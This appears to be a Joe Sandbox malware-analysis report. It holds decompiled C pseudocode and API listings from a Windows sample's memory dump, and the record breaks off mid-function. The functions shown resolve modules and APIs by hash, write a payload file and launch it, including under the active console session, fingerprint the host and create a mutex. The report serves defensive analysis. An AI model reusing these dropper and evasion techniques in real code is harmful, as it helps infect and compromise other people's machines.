0x00e87d52
0x00e87d52
0x00e87d57
0x00e87d65
0x00e87d6c
0x00e87d73
0x00e87d76
0x00e87d79
0x00e87d84
0x00e87d8e
0x00e87d8e
0x00e87d96
0x00e87d96
0x00e87d0b
0x00e87ccb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8791a
0x00e87fe2
0x00e87fe9
0x00e87ff4
0x00000000

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c31beed03347e2a81f6dabfa61f56521b61809433c308dbe5bbf3126c1df59
Instruction ID: dc06530ae45d42f277894771315c4adebb8d248b1dc2241ac0341f2d9687d6b0
Opcode Fuzzy Hash: a2c31beed03347e2a81f6dabfa61f56521b61809433c308dbe5bbf3126c1df59
Instruction Fuzzy Hash: BD428A35A08B458FCB29DF69C4806AABBF2FF88304F28956DD4DEA7651D734E941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00E81BE0, Relevance: .0, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E81BE0(intOrPtr __ecx) {
				intOrPtr _v8;
				signed int _t9;
				signed int _t11;
				intOrPtr* _t14;
				signed int _t19;
				intOrPtr* _t22;
				signed short* _t27;

				_push(__ecx);
				_t14 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				_v8 = __ecx;
				_t22 =  *_t14;
				if(_t22 == _t14) {
					L9:
					return 0;
				} else {
					do {
						_t27 =  *(_t22 + 0x30);
						_t19 = 0;
						_t9 =  *_t27 & 0x0000ffff;
						while(_t9 != 0) {
							_t4 = _t9 - 0x41; // -17
							_t11 = _t9 & 0x0000ffff;
							if(_t4 <= 0x19) {
								_t11 = _t11 + 0x20;
							}
							_t27 =  &(_t27[1]);
							_t19 = _t19 * 0x1003f + _t11;
							_t9 =  *_t27 & 0x0000ffff;
						}
						if(_t19 == _v8) {
							return  *((intOrPtr*)(_t22 + 0x18));
						} else {
							goto L8;
						}
						goto L11;
						L8:
						_t22 =  *_t22;
					} while (_t22 != _t14);
					goto L9;
				}
				L11:
			}

0x00e81be3
0x00e81bf0
0x00e81bf3
0x00e81bf6
0x00e81bfa
0x00e81c3d
0x00e81c45
0x00e81c00
0x00e81c00
0x00e81c00
0x00e81c03
0x00e81c05
0x00e81c0b
0x00e81c10
0x00e81c13
0x00e81c1a
0x00e81c1c
0x00e81c1c
0x00e81c25
0x00e81c28
0x00e81c2a
0x00e81c2d
0x00e81c35
0x00e81c4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00e81c37
0x00e81c37
0x00e81c39
0x00000000
0x00e81c00
0x00000000

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction ID: 7c4383d4b136907f2999e79e287b1c57fc1c21e16ec515e2e2a0d93326274f90
Opcode Fuzzy Hash: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction Fuzzy Hash: CE01FC336400199BCB24DF4AD5805B5F3E9FB9436979940EDD94C97200E731AD52C790

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E00E8A3A0(long _a4) {
				void* _v8;
				long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v96;
				char _v156;
				char _v284;
				short _v804;
				char _v1324;
				void* _t58;
				signed int _t62;
				WCHAR* _t68;
				long _t89;
				signed int _t93;
				WCHAR* _t99;
				void* _t122;
				void* _t123;
				void* _t136;
				void* _t139;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;

				_t136 = _a4;
				_t58 =  *((intOrPtr*)(_t136 + 4)) - 1;
				if(_t58 == 0) {
					_t122 =  *(_t136 + 8);
					_a4 =  *((intOrPtr*)(_t136 + 0xc));
					 *0xe8c214(0, 0x23, 0, 0,  &_v804);
					_t62 = GetTickCount();
					_t39 = (_t62 & 0x0000000f) + 4; // 0x4
					E00E82240( &_v284, _t39);
					 *((short*)(_t146 + (_t62 & 0x0000000f) * 2 - 0x110)) = 0;
					E00E81830(0xe815a4, 0xc, 0x435ca571,  &_v12);
					_t139 = _v12;
					_t68 =  &_v804;
					 *0xe8c200(_t68, 0x104, _t139, _t68,  &_v284);
					HeapFree(GetProcessHeap(), 0, _t139);
					_t140 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_t140 == 0xffffffff) {
						L13:
						HeapFree(GetProcessHeap(), 0, _t136);
						return 0;
					}
					WriteFile(_t140, _t122, _a4,  &_a4, 0);
					CloseHandle(_t140);
					memset( &_v96, 0, 0x44);
					_v96.cb = 0x44;
					if(CreateProcessW( &_v804, 0, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28) == 0) {
						goto L13;
					}
					CloseHandle(_v28.hProcess);
					_push(_v28.hThread);
					L12:
					CloseHandle();
					goto L13;
				}
				if(_t58 != 1) {
					goto L13;
				}
				_t89 =  *((intOrPtr*)(_t136 + 0xc));
				_t123 =  *(_t136 + 8);
				_v12 = _t89;
				_a4 = 0;
				__imp__WTSGetActiveConsoleSessionId();
				if(_t89 == 0xffffffff) {
					goto L13;
				}
				_push( &_v8);
				_push(_t89);
				if( *0xe8c224() != 0) {
					 *0xe8c074(_v8, 0x2000000, 0, 1, 1,  &_a4);
					CloseHandle(_v8);
				}
				 *0xe8c214(0, 0x23, 0, 0,  &_v804);
				_t93 = GetTickCount();
				_t13 = (_t93 & 0x0000000f) + 4; // 0x4
				E00E82240( &_v156, _t13);
				 *((short*)(_t146 + (_t93 & 0x0000000f) * 2 - 0x90)) = 0;
				E00E81830(0xe815a4, 0xc, 0x435ca571,  &_v8);
				_t143 = _v8;
				_t99 =  &_v804;
				 *0xe8c200(_t99, 0x104, _t143, _t99,  &_v156);
				HeapFree(GetProcessHeap(), 0, _t143);
				_t144 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t144 != 0xffffffff) {
					WriteFile(_t144, _t123, _v12,  &_v12, 0);
					CloseHandle(_t144);
					E00E81830(0xe81398, 4, 0x435ca571,  &_v8);
					_t145 = _v8;
					 *0xe8c200( &_v1324, 0x104, _t145,  &_v804);
					HeapFree(GetProcessHeap(), 0, _t145);
					if(E00E82180( &_v1324, _a4,  &_v28) != 0) {
						CloseHandle(_v28);
						CloseHandle(_v28.hThread);
					}
				}
				_push(_a4);
				goto L12;
			}

0x00e8a3ac
0x00e8a3b2
0x00e8a3b3
0x00e8a550
0x00e8a553
0x00e8a565
0x00e8a56b
0x00e8a57c
0x00e8a57f
0x00e8a58b
0x00e8a5a1
0x00e8a5a6
0x00e8a5b0
0x00e8a5be
0x00e8a5d1
0x00e8a5f6
0x00e8a5fb
0x00e8a666
0x00e8a670
0x00e8a67e
0x00e8a67e
0x00e8a608
0x00e8a60f
0x00e8a61d
0x00e8a626
0x00e8a652
0x00000000
0x00000000
0x00e8a657
0x00e8a65d
0x00e8a660
0x00e8a660
0x00000000
0x00e8a660
0x00e8a3ba
0x00000000
0x00000000
0x00e8a3c0
0x00e8a3c3
0x00e8a3c6
0x00e8a3c9
0x00e8a3d0
0x00e8a3d9
0x00000000
0x00000000
0x00e8a3e2
0x00e8a3e3
0x00e8a3ec
0x00e8a400
0x00e8a409
0x00e8a409
0x00e8a41e
0x00e8a424
0x00e8a435
0x00e8a438
0x00e8a444
0x00e8a45a
0x00e8a45f
0x00e8a469
0x00e8a477
0x00e8a48a
0x00e8a4af
0x00e8a4b4
0x00e8a4c5
0x00e8a4cc
0x00e8a4e5
0x00e8a4ea
0x00e8a501
0x00e8a514
0x00e8a531
0x00e8a536
0x00e8a53f
0x00e8a53f
0x00e8a531
0x00e8a545
0x00000000

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00E8A3D0
CloseHandle.KERNEL32(?), ref: 00E8A409
GetTickCount.KERNEL32 ref: 00E8A424
_snwprintf.NTDLL ref: 00E8A477
GetProcessHeap.KERNEL32(00000000,?), ref: 00E8A483
HeapFree.KERNEL32(00000000), ref: 00E8A48A
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00E8A4A9
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00E8A4C5
CloseHandle.KERNEL32(00000000), ref: 00E8A4CC
_snwprintf.NTDLL ref: 00E8A501
GetProcessHeap.KERNEL32(00000000,?), ref: 00E8A50D
HeapFree.KERNEL32(00000000), ref: 00E8A514
CloseHandle.KERNEL32(?), ref: 00E8A536
CloseHandle.KERNEL32(?), ref: 00E8A53F
GetTickCount.KERNEL32 ref: 00E8A56B
_snwprintf.NTDLL ref: 00E8A5BE
GetProcessHeap.KERNEL32(00000000,?), ref: 00E8A5CA
HeapFree.KERNEL32(00000000), ref: 00E8A5D1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00E8A5F0
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E8A608
CloseHandle.KERNEL32(00000000), ref: 00E8A60F
memset.NTDLL ref: 00E8A61D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E8A64A
CloseHandle.KERNEL32(?), ref: 00E8A657
CloseHandle.KERNEL32(?), ref: 00E8A660
GetProcessHeap.KERNEL32(00000000,?), ref: 00E8A669
HeapFree.KERNEL32(00000000), ref: 00E8A670

Strings

D, xrefs: 00E8A626

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandle$Process$FileFree$Create_snwprintf$CountTickWrite$ActiveConsoleSessionmemset
String ID: D
API String ID: 65010116-2746444292
Opcode ID: 00c7db195205ba466d1eb77e9ad9e01d9d9efd525911b87e8c409da113edf5c1
Instruction ID: 074187091cd2afb9b8de2db9e812a8b45e500866dbbfa140059fba462588e1ef
Opcode Fuzzy Hash: 00c7db195205ba466d1eb77e9ad9e01d9d9efd525911b87e8c409da113edf5c1
Instruction Fuzzy Hash: 5E814C71940108BFEB10ABA1DC8AFEA7B7CFB09715F144165FA0DF60E1D7709A498BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E89320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00E89320(void* __ecx) {
				void* _v8;
				long _v12;
				short _v44;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				signed int _t32;
				char* _t35;
				int _t53;
				signed int _t60;
				void* _t71;
				long _t72;
				void* _t74;
				void* _t75;
				signed int _t76;
				char _t77;
				void* _t79;
				signed short* _t80;
				long _t87;
				void* _t92;
				void* _t94;
				short* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t75 = __ecx;
				_t25 =  *0xe8c27c; // 0x0
				_t103 = _t102 - 0x28;
				 *0xe8c3ac = _t25;
				GetModuleFileNameW(0, 0xe8c9c8, 0x104);
				_t27 =  *0xe8c040(0, 0, 6);
				if(_t27 != 0) {
					 *0xe8c2a4 =  *0xe8c2a4 | 0x00000001;
					 *0xe8c0a8(_t27);
				}
				_t28 =  *0xe8c3ac; // 0x0
				_t96 = 0xe8c3b0;
				_v8 = _t28;
				_t92 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
				if(_t92 == 0) {
					_t92 = _v12;
				} else {
					_push(_t75);
					E00E81790(0xe813d0, 0x158, _t92);
					_t103 = _t103 + 8;
				}
				_t76 =  *0xe8c1e4(_t92, _t71);
				_t72 = 2;
				_v12 = _t76;
				do {
					_t32 = _v8;
					_v8 =  !(_t32 / _t76);
					_t35 = _t92 + _t32 % _t76;
					if(_t35 <= _t92) {
						L9:
						if( *_t35 != 0x2c) {
							L11:
							_t77 =  *_t35;
							if(_t77 == 0) {
								goto L15;
							}
							while(_t77 != 0x2c) {
								_t35 = _t35 + 1;
								 *_t96 = _t77;
								_t96 = _t96 + 2;
								_t77 =  *_t35;
								if(_t77 != 0) {
									continue;
								}
								goto L15;
							}
							goto L15;
						}
						L10:
						_t35 = _t35 + 1;
						goto L11;
					}
					while( *_t35 != 0x2c) {
						_t35 = _t35 - 1;
						if(_t35 > _t92) {
							continue;
						}
						goto L9;
					}
					goto L10;
					L15:
					_t76 = _v12;
					_t72 = _t72 - 1;
				} while (_t72 != 0);
				HeapFree(GetProcessHeap(), 0, _t92);
				 *_t96 = 0;
				E00E81830(0xe81384, 0xc, 0x7d1cc189,  &_v12);
				_t104 = _t103 + 8;
				_push(0xe8c5b8);
				_push(0);
				_push(0);
				if(( *0xe8c2a4 & 0x00000001) == 0) {
					 *0xe8c214(0, 0x1c);
					_t87 = 0x14;
					_t79 = 0xe81530;
				} else {
					 *0xe8c214(0, 0x29);
					_t87 = 4;
					_t79 = 0xe81380;
				}
				E00E81830(_t79, _t87, 0x7d1cc189,  &_v8);
				_t97 = _v8;
				 *0xe8c200(0xe8c5b8, 0x104, _t97, 0xe8c5b8, 0xe8c3b0);
				HeapFree(GetProcessHeap(), 0, _t97);
				_t98 = _v12;
				 *0xe8c200(0xe8c7c0, 0x104, _t98, 0xe8c5b8, 0xe8c3b0);
				_t106 = _t104 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t98);
				_t99 = CreateFileW(0xe8c9c8, 0x80000000, 1, 0, 3, 0, 0);
				if(_t99 != 0xffffffff) {
					_t94 = CreateFileMappingW(_t99, 0, 2, 0, 0, 0);
					if(_t94 != 0) {
						_t74 = MapViewOfFile(_t94, 4, 0, 0, 0);
						if(_t74 != 0) {
							 *0xe8cbd0 = RtlComputeCrc32(0, _t74, GetFileSize(_t99, 0));
							UnmapViewOfFile(_t74);
						}
						CloseHandle(_t94);
					}
					CloseHandle(_t99);
				}
				_v12 = 0x10;
				_t53 = GetComputerNameW( &_v44,  &_v12);
				if(_t53 == 0) {
					L40:
					return _t53;
				} else {
					_t80 =  &_v44;
					if(_v44 == 0) {
						L36:
						_t101 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
						if(_t101 == 0) {
							_t101 = _v12;
						} else {
							_push(_t80);
							E00E81790(0xe81390, 8, _t101);
							_t106 = _t106 + 8;
						}
						 *0xe8c210(0xe8c2a8, 0x104, _t101,  &_v44,  *0xe8c3ac);
						_t53 = HeapFree(GetProcessHeap(), 0, _t101);
						goto L40;
					}
					do {
						_t60 =  *_t80 & 0x0000ffff;
						if(_t60 < 0x30 || _t60 > 0x39) {
							if(_t60 < 0x61 || _t60 > 0x7a) {
								if(_t60 < 0x41 || _t60 > 0x5a) {
									 *_t80 = 0x58;
								}
							}
						}
						_t80 =  &(_t80[1]);
					} while ( *_t80 != 0);
					goto L36;
				}
			}

0x00e89320
0x00e89323
0x00e89328
0x00e8932b
0x00e8933c
0x00e89348
0x00e89350
0x00e89352
0x00e8935a
0x00e8935a
0x00e89360
0x00e8936e
0x00e89373
0x00e89383
0x00e89387
0x00e8939f
0x00e89389
0x00e89389
0x00e89395
0x00e8939a
0x00e8939a
0x00e893aa
0x00e893ac
0x00e893b1
0x00e893b4
0x00e893b4
0x00e893bd
0x00e893c0
0x00e893c5
0x00e893d1
0x00e893d4
0x00e893d7
0x00e893d7
0x00e893db
0x00000000
0x00000000
0x00e893e0
0x00e893e9
0x00e893ea
0x00e893ed
0x00e893f0
0x00e893f4
0x00000000
0x00000000
0x00000000
0x00e893f4
0x00000000
0x00e893e0
0x00e893d6
0x00e893d6
0x00000000
0x00e893d6
0x00e893c7
0x00e893cc
0x00e893cf
0x00000000
0x00000000
0x00000000
0x00e893cf
0x00000000
0x00e893f6
0x00e893f6
0x00e893f9
0x00e893f9
0x00e89406
0x00e89413
0x00e89424
0x00e89429
0x00e89433
0x00e89438
0x00e8943a
0x00e8943c
0x00e89458
0x00e8945e
0x00e89463
0x00e8943e
0x00e89442
0x00e89448
0x00e8944d
0x00e8944d
0x00e89471
0x00e89476
0x00e8948e
0x00e894a1
0x00e894a7
0x00e894bf
0x00e894c5
0x00e894d2
0x00e894f2
0x00e894f7
0x00e8950a
0x00e8950e
0x00e8951f
0x00e89523
0x00e89539
0x00e8953e
0x00e8953e
0x00e89545
0x00e89545
0x00e8954c
0x00e8954c
0x00e89555
0x00e89561
0x00e8956a
0x00e8960b
0x00e89610
0x00e89570
0x00e89575
0x00e89578
0x00e895ad
0x00e895be
0x00e895c2
0x00e895da
0x00e895c4
0x00e895c4
0x00e895d0
0x00e895d5
0x00e895d5
0x00e895f2
0x00e89605
0x00000000
0x00e89605
0x00e89580
0x00e89580
0x00e89586
0x00e89590
0x00e8959a
0x00e895a1
0x00e895a1
0x00e8959a
0x00e89590
0x00e895a4
0x00e895a7
0x00000000
0x00e89580

APIs

GetModuleFileNameW.KERNEL32(00000000,00E8C9C8,00000104,?,?,?,?,?,?,?,?,?,00E89310), ref: 00E8933C
GetProcessHeap.KERNEL32(00000008,0000015C,00000000,00E816C0,?,?,?,?,?,?,?,?,?,00E89310), ref: 00E89376
RtlAllocateHeap.NTDLL(00000000), ref: 00E8937D
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00E89310), ref: 00E893A4
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00E89310), ref: 00E893FF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00E89310), ref: 00E89406
_snwprintf.NTDLL ref: 00E8948E
GetProcessHeap.KERNEL32(00000000,00E89310), ref: 00E8949A
HeapFree.KERNEL32(00000000), ref: 00E894A1
_snwprintf.NTDLL ref: 00E894BF
GetProcessHeap.KERNEL32(00000000,?), ref: 00E894CB
HeapFree.KERNEL32(00000000), ref: 00E894D2
CreateFileW.KERNEL32(00E8C9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E894EC
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00E89504
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00E89519
GetFileSize.KERNEL32(00000000,00000000), ref: 00E89528
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00E89532
UnmapViewOfFile.KERNEL32(00000000), ref: 00E8953E
CloseHandle.KERNEL32(00000000), ref: 00E89545
CloseHandle.KERNEL32(00000000), ref: 00E8954C
GetComputerNameW.KERNEL32(?,?), ref: 00E89561
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00E895B1
RtlAllocateHeap.NTDLL(00000000), ref: 00E895B8
_snprintf.NTDLL ref: 00E895F2
GetProcessHeap.KERNEL32(00000000,00000010), ref: 00E895FE
HeapFree.KERNEL32(00000000), ref: 00E89605

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Free$AllocateCloseCreateHandleNameView_snwprintf$ComputeComputerCrc32MappingModuleSizeUnmap_snprintflstrlen
String ID:
API String ID: 968319538-0
Opcode ID: 220e6a7f99e4b71e931c14eaebb9415fd258f84518d2c1f3544f7165231c92e8
Instruction ID: 86e764a9a5c538c511c6b092e7e9e8d10210b66fe5a53c2fa71d167a46cf15d5
Opcode Fuzzy Hash: 220e6a7f99e4b71e931c14eaebb9415fd258f84518d2c1f3544f7165231c92e8
Instruction Fuzzy Hash: EA81B671A80200BFEB117BA5AC4EFAE3A78EB46705F382055F60DFA1D2D7B059458771

Uniqueness

Uniqueness Score: -1.00%

Function 00E89C50, Relevance: 36.2, APIs: 24, Instructions: 185
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00E89C50(void* __ecx) {
				void* _v8;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_push(__ecx);
				E00E81830(0xe8155c, 0xc, 0x4a604ebc,  &_v8);
				_t100 = _v8;
				E00E81B10(LoadLibraryW(_t100), 0xe81040, 0x21, 0x54b7e774, 0xe8c040);
				HeapFree(GetProcessHeap(), 0, _t100);
				E00E81830(0xe81568, 0xc, 0x4a604ebc,  &_v8);
				_t101 = _v8;
				E00E81B10(LoadLibraryW(_t101), 0xe81024, 1, 0x3c505b91, 0xe8c0c8);
				HeapFree(GetProcessHeap(), 0, _t101);
				E00E81830(0xe81574, 0xc, 0x4a604ebc,  &_v8);
				_t102 = _v8;
				E00E81B10(LoadLibraryW(_t102), 0xe81028, 2, 0x10577008, 0xe8c214);
				HeapFree(GetProcessHeap(), 0, _t102);
				E00E81830(0xe81580, 0xc, 0x4a604ebc,  &_v8);
				_t103 = _v8;
				E00E81B10(LoadLibraryW(_t103), 0xe8100c, 1, 0x7194b56b, 0xe8c0c4);
				HeapFree(GetProcessHeap(), 0, _t103);
				E00E81830(0xe81550, 0xc, 0x4a604ebc,  &_v8);
				_t104 = _v8;
				E00E81B10(LoadLibraryW(_t104), 0xe810c4, 1, 0x20edec96, 0xe8c0cc);
				HeapFree(GetProcessHeap(), 0, _t104);
				E00E81830(0xe81544, 0xc, 0x4a604ebc,  &_v8);
				_t105 = _v8;
				E00E81B10(LoadLibraryW(_t105), 0xe810c8, 2, 0x620cb38e, 0xe8c21c);
				HeapFree(GetProcessHeap(), 0, _t105);
				E00E81830(0xe81598, 0xc, 0x4a604ebc,  &_v8);
				_t106 = _v8;
				E00E81B10(LoadLibraryW(_t106), 0xe81220, 0xe, 0x5a7185ae, 0xe8c230);
				HeapFree(GetProcessHeap(), 0, _t106);
				E00E81830(0xe8158c, 0xc, 0x4a604ebc,  &_v8);
				_t107 = _v8;
				E00E81B10(LoadLibraryW(_t107), 0xe81214, 3, 0x73ee0ad8, 0xe8c224);
				HeapFree(GetProcessHeap(), 0, _t107);
				return E00E892A0(_t61);
			}

0x00e89c53
0x00e89c68
0x00e89c6d
0x00e89c8d
0x00e89c9f
0x00e89cb8
0x00e89cbd
0x00e89cdd
0x00e89cef
0x00e89d08
0x00e89d0d
0x00e89d2d
0x00e89d3f
0x00e89d58
0x00e89d5d
0x00e89d7d
0x00e89d8f
0x00e89da8
0x00e89dad
0x00e89dcd
0x00e89ddf
0x00e89df8
0x00e89dfd
0x00e89e1d
0x00e89e2f
0x00e89e48
0x00e89e4d
0x00e89e6d
0x00e89e7f
0x00e89e98
0x00e89ea0
0x00e89ebd
0x00e89ecf
0x00e89ede

APIs

Part of subcall function 00E81830: GetProcessHeap.KERNEL32(00000008,00E89F6B,00000000,00000000,00E81004,?,00E815F4,4DBAC13F,00E89F6B,?,00000000), ref: 00E81844
Part of subcall function 00E81830: RtlAllocateHeap.NTDLL(00000000,?,00E815F4), ref: 00E8184B

LoadLibraryW.KERNEL32(00E816C0,?,00E816C0), ref: 00E89C74
GetProcessHeap.KERNEL32(00000000,00E816C0,?,?,?,?,00E816C0), ref: 00E89C98
HeapFree.KERNEL32(00000000,?,?,?,?,00E816C0), ref: 00E89C9F
LoadLibraryW.KERNEL32(00E816C0,?,?,?,?,?,?,00E816C0), ref: 00E89CC4
GetProcessHeap.KERNEL32(00000000,00E816C0,?,?,?,?,?,?,?,?,?,00E816C0), ref: 00E89CE8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00E816C0), ref: 00E89CEF
LoadLibraryW.KERNEL32(00E816C0,?,?,?,?,?,?,?,?,?,?,?,00E816C0), ref: 00E89D14
GetProcessHeap.KERNEL32(00000000,00E816C0), ref: 00E89D38
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E816C0), ref: 00E89D3F
LoadLibraryW.KERNEL32(00E816C0), ref: 00E89D64
GetProcessHeap.KERNEL32(00000000,00E816C0), ref: 00E89D88
HeapFree.KERNEL32(00000000), ref: 00E89D8F
LoadLibraryW.KERNEL32(00E816C0), ref: 00E89DB4
GetProcessHeap.KERNEL32(00000000,00E816C0), ref: 00E89DD8
HeapFree.KERNEL32(00000000), ref: 00E89DDF
LoadLibraryW.KERNEL32(00E816C0), ref: 00E89E04
GetProcessHeap.KERNEL32(00000000,00E816C0), ref: 00E89E28
HeapFree.KERNEL32(00000000), ref: 00E89E2F
LoadLibraryW.KERNEL32(00E816C0), ref: 00E89E54
GetProcessHeap.KERNEL32(00000000,00E816C0), ref: 00E89E78
HeapFree.KERNEL32(00000000), ref: 00E89E7F
LoadLibraryW.KERNEL32(00E816C0), ref: 00E89EA4
GetProcessHeap.KERNEL32(00000000,00E816C0), ref: 00E89EC8
HeapFree.KERNEL32(00000000), ref: 00E89ECF

Part of subcall function 00E892A0: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00E892B5

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeLibraryLoad$AllocateDirectoryWindows
String ID:
API String ID: 357832750-0
Opcode ID: 2cbb6f67d83b5acf4344d2e087cc69b3854e51c532f25e766f06f1e6701ace0c
Instruction ID: 090386198dd6c75cb73f6ba2e02a975e96a693b5b9f3cfac91d0592789749203
Opcode Fuzzy Hash: 2cbb6f67d83b5acf4344d2e087cc69b3854e51c532f25e766f06f1e6701ace0c
Instruction Fuzzy Hash: E3516071A41204BBEB0077E1AC5EF9F3A6CDB82346F201094F90DB7697D6315E4A87B5

Uniqueness

Uniqueness Score: -1.00%

Function 00E89060, Relevance: 34.7, APIs: 23, Instructions: 160
memorysynchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00E89060(void* __eflags) {
				void* _v8;
				char _v12;
				short _v140;
				short _v268;
				short _v396;
				long _t31;
				void* _t45;
				void* _t47;
				long _t50;
				long _t57;
				int _t59;
				signed int _t60;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t59 = 0;
				memset(0xe8c284, 0, 0x18);
				_t60 = 0xe81364;
				_t2 = _t59 + 0xc; // 0xc
				E00E81830(0xe81364, _t2, 0x4a604ebc,  &_v8);
				_t67 = _v8;
				 *0xe8c200( &_v140, 0x40, _t67,  *0xe8c27c);
				HeapFree(GetProcessHeap(), 0, _t67);
				_t66 = CreateMutexW(0, 0,  &_v140);
				if(_t66 == 0) {
					L12:
					 *0xe8c0b8( *0xe8c288);
					 *0xe8c064( *0xe8c28c);
					 *0xe8c064( *0xe8c290);
					 *0xe8c08c( *0xe8c284, 0);
					E00E88AA0();
					return E00E8A750(_t60 | 0xffffffff);
				}
				_t31 = WaitForSingleObject(_t66, 0);
				if(_t31 == 0 || _t31 == 0x80) {
					E00E81830(0xe81258, 0xc, 0x4a604ebc,  &_v8);
					_t68 = _v8;
					 *0xe8c200( &_v396, 0x40, _t68,  *0xe8c27c);
					HeapFree(GetProcessHeap(), 0, _t68);
					_t60 = 0xe81264;
					E00E81830(0xe81264, 0xc, 0x4a604ebc,  &_v8);
					_t69 = _v8;
